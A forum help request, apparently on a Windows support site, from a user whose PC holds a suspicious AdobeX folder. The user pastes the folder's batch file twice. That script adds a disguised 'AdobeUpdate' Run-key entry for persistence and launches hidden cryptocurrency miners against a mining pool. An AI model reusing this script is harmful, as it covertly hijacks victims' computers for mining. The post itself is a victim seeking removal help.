Hello, i had a bsod problem and @Arc told me to remove ESET nod 32 and install Microsft Essentials and Malware Bytes. That fixed the problem but now i think i have got virus on my pc! In %AppData%/Roaming there is a folder called AdobeX that is pretty suspicious and contains winsvchost.exe and some other .bat files which seem suspicious too! the bat file contains these
(@echo off
%windir%\system32\taskkill.exe /f /im ssvchost.exe
%windir%\system32\taskkill.exe /f /im winsvchost.exe
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeUpdate /d "wscript \"%appdata%\AdobeX\invis.vbs\" \"%appdata%\AdobeX\bat.bat\"" /f
IF NOT EXIST "%ProgramFiles(x86)%" (
start /b /low "a" "%appdata%\AdobeX\ssvchost.exe" -o ypool.net - cryptocurrency mining pool -u BRZ.PTS -p x -m256
)
IF EXIST "%ProgramFiles(x86)%" (
start /b /low "a" "%appdata%\AdobeX\winsvchost.exe" -o ypool.net - cryptocurrency mining pool -u BRZ.x -p x -target 9 -bttarget 9 -m 43 -primes 960000 -primorial 43 -s 1024000 -d 25 -se 10
)
My pc crashes and other things! I have done restore but nothing. Every startup the winsvchost.exe runs! I have deleted the folder but nothing! it gets deleted but after restart is there !
Please help me im in desperate need!
(@echo off
%windir%\system32\taskkill.exe /f /im ssvchost.exe
%windir%\system32\taskkill.exe /f /im winsvchost.exe
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeUpdate /d "wscript \"%appdata%\AdobeX\invis.vbs\" \"%appdata%\AdobeX\bat.bat\"" /f
IF NOT EXIST "%ProgramFiles(x86)%" (
start /b /low "a" "%appdata%\AdobeX\ssvchost.exe" -o ypool.net - cryptocurrency mining pool -u BRZ.PTS -p x -m256
)
IF EXIST "%ProgramFiles(x86)%" (
start /b /low "a" "%appdata%\AdobeX\winsvchost.exe" -o ypool.net - cryptocurrency mining pool -u BRZ.x -p x -target 9 -bttarget 9 -m 43 -primes 960000 -primorial 43 -s 1024000 -d 25 -se 10
)
My pc crashes and other things! I have done restore but nothing. Every startup the winsvchost.exe runs! I have deleted the folder but nothing! it gets deleted but after restart is there !
Please help me im in desperate need!
My Computer
At a glance
Microsoft Windows 8.1 Pro 64-biAMD FX 6100CORSAIR Vengeance 8GB 1600 (2 x 4GB)Asus GeForce GTX 760
- Computer type
- PC/Desktop
- Computer Manufacturer/Model Number
- custom build
- OS
- Microsoft Windows 8.1 Pro 64-bi
- CPU
- AMD FX 6100
- Motherboard
- GA-970A-D3
- Memory
- CORSAIR Vengeance 8GB 1600 (2 x 4GB)
- Graphics Card(s)
- Asus GeForce GTX 760
- Screen Resolution
- 1920x1080
- Hard Drives
- OS: WD Black 1TB. Other: WD Blue 650GB
- Cooling
- CPU: CM Hyper 412S
- Antivirus
- Bitdefender Total Security 2014
- Browser
- Google Chrome 64bit